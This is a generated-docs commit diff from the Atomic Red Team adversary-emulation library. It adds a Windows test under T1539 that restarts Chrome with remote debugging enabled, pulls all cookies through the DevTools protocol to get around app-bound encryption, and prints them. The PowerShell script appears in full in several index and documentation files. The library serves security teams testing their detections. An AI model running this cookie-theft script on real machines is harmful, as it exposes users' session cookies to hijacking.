Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1702-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1703-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Indexes-CSV/index.csv

@@ -1533,6 +1533,7 @@ credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Con
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
 credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
+credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -1038,6 +1038,7 @@ credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using ke
 credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Connection,0b207037-813c-4444-ac3f-b597cf280a67,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
+credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -2130,6 +2130,7 @@
   - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
   - Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
   - Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
+  - Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
 - [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
   - Atomic Test #2: Registry parse with pypykatz [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1492,6 +1492,7 @@
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
   - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
   - Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
+  - Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
 - [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
   - Atomic Test #2: Registry parse with pypykatz [windows]

atomics/Indexes/index.yaml

@@ -89888,6 +89888,50 @@ credential-access:
         cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
         name: bash
         elevation_required: false
+    - name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
+      auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
+      description: |-
+        Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
+        Note: Will stop any instances of Chrome already running
+        Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $devToolsPort = 9222
+          $testUrl = "https://www.google.com"
+          stop-process -name "chrome" -force -erroraction silentlycontinue
+          $chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
+          Start-Sleep 10
+          $jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
+          $devToolsPages = ConvertFrom-Json $jsonResponse.Content
+          $ws_url = $devToolsPages[0].webSocketDebuggerUrl
+          $ws = New-Object System.Net.WebSockets.ClientWebSocket
+          $uri = New-Object System.Uri($ws_url)
+          $ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
+          $GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
+          $buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
+          $segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
+          $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
+          $completeMessage = New-Object System.Text.StringBuilder
+          do {
+              $receivedBuffer = New-Object byte[] 2048
+              $receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
+              $result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
+              $receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
+              $completeMessage.Append($receivedString)
+          } while (-not $result.EndOfMessage)
+          $ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
+          try {
+              $response = ConvertFrom-Json $completeMessage.ToString()
+              $cookies = $response.result.cookies
+          } catch {
+              Write-Host "Error parsing JSON data."
+          }
+          Write-Host $cookies
+          Stop-Process $chromeProcess -Force
+        name: powershell
+        elevation_required: false
   T1003.002:
     technique:
       modified: '2024-10-15T16:40:52.174Z'

atomics/Indexes/windows-index.yaml

@@ -74241,6 +74241,50 @@ credential-access:
           '
         name: powershell
         elevation_required: false
+    - name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
+      auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
+      description: |-
+        Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
+        Note: Will stop any instances of Chrome already running
+        Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $devToolsPort = 9222
+          $testUrl = "https://www.google.com"
+          stop-process -name "chrome" -force -erroraction silentlycontinue
+          $chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
+          Start-Sleep 10
+          $jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
+          $devToolsPages = ConvertFrom-Json $jsonResponse.Content
+          $ws_url = $devToolsPages[0].webSocketDebuggerUrl
+          $ws = New-Object System.Net.WebSockets.ClientWebSocket
+          $uri = New-Object System.Uri($ws_url)
+          $ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
+          $GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
+          $buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
+          $segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
+          $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
+          $completeMessage = New-Object System.Text.StringBuilder
+          do {
+              $receivedBuffer = New-Object byte[] 2048
+              $receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
+              $result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
+              $receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
+              $completeMessage.Append($receivedString)
+          } while (-not $result.EndOfMessage)
+          $ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
+          try {
+              $response = ConvertFrom-Json $completeMessage.ToString()
+              $cookies = $response.result.cookies
+          } catch {
+              Write-Host "Error parsing JSON data."
+          }
+          Write-Host $cookies
+          Stop-Process $chromeProcess -Force
+        name: powershell
+        elevation_required: false
   T1003.002:
     technique:
       modified: '2024-10-15T16:40:52.174Z'

atomics/T1539/T1539.md

@@ -18,6 +18,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session
 
 - [Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)](#atomic-test-3---steal-chrome-cookies-via-remote-debugging-mac)
 
+- [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)
+
 
 <br/>
 
@@ -198,4 +200,65 @@ go build
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)
+Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
+Note: Will stop any instances of Chrome already running
+Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b647f4ee-88de-40ac-9419-f17fac9489a7
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$devToolsPort = 9222
+$testUrl = "https://www.google.com"
+stop-process -name "chrome" -force -erroraction silentlycontinue
+$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
+Start-Sleep 10
+$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
+$devToolsPages = ConvertFrom-Json $jsonResponse.Content
+$ws_url = $devToolsPages[0].webSocketDebuggerUrl
+$ws = New-Object System.Net.WebSockets.ClientWebSocket
+$uri = New-Object System.Uri($ws_url)
+$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
+$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
+$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
+$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
+$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
+$completeMessage = New-Object System.Text.StringBuilder
+do {
+    $receivedBuffer = New-Object byte[] 2048
+    $receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
+    $result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
+    $receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
+    $completeMessage.Append($receivedString)
+} while (-not $result.EndOfMessage)
+$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
+try {
+    $response = ConvertFrom-Json $completeMessage.ToString()
+    $cookies = $response.result.cookies
+} catch {
+    Write-Host "Error parsing JSON data."
+}
+Write-Host $cookies
+Stop-Process $chromeProcess -Force
+```
+
+
+
+
+
+
 <br/>

atomics/T1539/T1539.yaml

@@ -116,7 +116,7 @@ atomic_tests:
     name: bash
     elevation_required: false
 - name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
-  auto_generated_guid: 
+  auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
   description: |-
     Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
     Note: Will stop any instances of Chrome already running

atomics/used_guids.txt

@@ -1726,3 +1726,4 @@ de47f4a0-2acb-416d-9a6b-cee584a4c4d1
 4758003d-db14-4959-9c0f-9e87558ac69e
 1f23bfe8-36d4-49ce-903a-19a1e8c6631b
 89a83c3e-0b39-4c80-99f5-c2aa084098bd
+b647f4ee-88de-40ac-9419-f17fac9489a7